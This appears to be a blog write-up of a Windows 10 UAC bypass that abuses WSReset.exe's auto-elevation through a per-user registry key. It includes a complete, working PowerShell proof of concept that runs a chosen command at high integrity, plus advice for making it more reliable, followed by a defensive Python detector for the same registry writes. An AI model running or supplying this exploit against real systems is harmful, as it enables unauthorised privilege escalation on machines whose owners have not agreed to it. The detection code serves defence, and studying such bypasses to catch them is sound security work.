Bypassing UAC on Windows 10 with the Store's WSReset.exe


I ran into a Windows 10 environment, so I went looking for a UAC bypass.

Environment

win10 1909 18363.535 Pro

Reproduction

Checking with Microsoft's sigcheck.exe signature tool shows that C:\Windows\System32\WSReset.exe carries the autoElevate property set to true.


Add a filter in Procmon64.exe on WSReset.exe's registry activity.


The lookup of HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command comes back as not found.

According to the Microsoft documentation, user-specific settings take precedence over the defaults, and the current user can write this value, so a PoC can be put together in PowerShell.

```powershell
<#
.SYNOPSIS
Fileless UAC Bypass by Abusing Shell API

Author: Hashim Jawad of ACTIVELabs

.PARAMETER Command
Specifies the command you would like to run in high integrity context.

.EXAMPLE
Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe"

This will effectively start cmd.exe in high integrity context.

.NOTES
This UAC bypass has been tested on the following:
 - Windows 10 Version 1803 OS Build 17134.590
 - Windows 10 Version 1809 OS Build 17763.316
#>

function Invoke-WSResetBypass {
    Param (
        [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
    )

    # Per-user key that WSReset.exe queries before falling back to the HKCR default
    $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
    New-Item $CommandPath -Force | Out-Null
    New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
    Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
    Write-Host "[+] Registry entry has been created successfully!"

    Write-Host "[+] Starting WSReset.exe"
    # -PassThru is needed for Start-Process to return the process object
    $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden -PassThru

    Write-Host "[+] Triggering payload.."
    Start-Sleep -Seconds 5

    # Cleanup after a fixed delay; see the note below if WSReset.exe is slow to start
    if (Test-Path $CommandPath) {
        Remove-Item $CommandPath -Recurse -Force
        Write-Host "[+] Cleaning up registry entry"
    }
}
```

In my own testing, reproduction failed several times because WSReset.exe was slow to start. I suggest dropping the registry cleanup at the end of the PowerShell script so that the key is still there when WSReset runs, but remember to remove it by hand afterwards.
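From the defender's side, the per-user key above is a clear artifact to watch for. As an added example, not code from the original post or from ACTIVELabs, the Python below flags registry writes that land on that key; the event record shape, the hive prefixes and the sample events are all constructed here rather than taken from any specific product.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Per-user key the post shows WSReset.exe querying (HKCU wins over the HKCR default).
WSRESET_COMMAND_KEY = r"\software\classes\appx82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command"
# Per-user hive prefixes as logs usually render them: HKCU\ or HKU\<SID>\ (assumption).
USER_HIVE = re.compile(r"^hk(cu|u\\s-1-5-21-[\d-]+)\\", re.IGNORECASE)


@dataclass
class RegistryWrite:
    """Constructed 'registry value set' record; field names are an assumption, not a product schema."""
    image: str    # process that performed the write
    target: str   # full path of the value written, e.g. HKU\<SID>\...\command\DelegateExecute
    details: str  # data written


def classify(ev: RegistryWrite) -> Optional[str]:
    """Label a write that touches the per-user WSReset command key, else None."""
    if not USER_HIVE.match(ev.target):
        return None  # HKLM/HKCR writes already need admin rights; not this pattern
    key, _, value_name = ev.target.rpartition("\\")
    if not key.lower().endswith(WSRESET_COMMAND_KEY):
        return None
    name = value_name.lower()
    if name == "delegateexecute":
        return "DelegateExecute created under per-user WSReset key"
    if name == "(default)":
        return "per-user WSReset open\\command redirected to: " + ev.details
    return "unexpected value under per-user WSReset key: " + value_name


def analyse(events: List[RegistryWrite]) -> List[Tuple[str, str]]:
    """Return (writing process, finding) for each event that matches the pattern."""
    return [(ev.image, label) for ev in events if (label := classify(ev))]


# Constructed sample: the two writes the PoC makes, plus one unrelated Explorer write.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_SID = r"HKU\S-1-5-21-1111-2222-3333-1001"
_KEY = _SID + r"\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
SAMPLE = [
    RegistryWrite(_PS, _KEY + r"\DelegateExecute", ""),
    RegistryWrite(_PS, _KEY + r"\(Default)", r"C:\Windows\System32\cmd.exe /c start cmd.exe"),
    RegistryWrite(r"C:\Windows\explorer.exe",
                  _SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx", "..."),
]

if __name__ == "__main__":
    for image, finding in analyse(SAMPLE):
        print(f"[!] {image}: {finding}")
```

Pairing this with a process-creation rule for WSReset.exe spawning an unexpected child covers the second half of the chain.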


References

  1. https://www.activecyber.us/activelabs/windows-uac-bypass
  2. https://github.com/sailay1996/UAC_Bypass_In_The_Wild

The writing is poor, the wording flippant, the content shallow and the hands-on work clumsy. Pointers and corrections from the more experienced are very welcome; many thanks.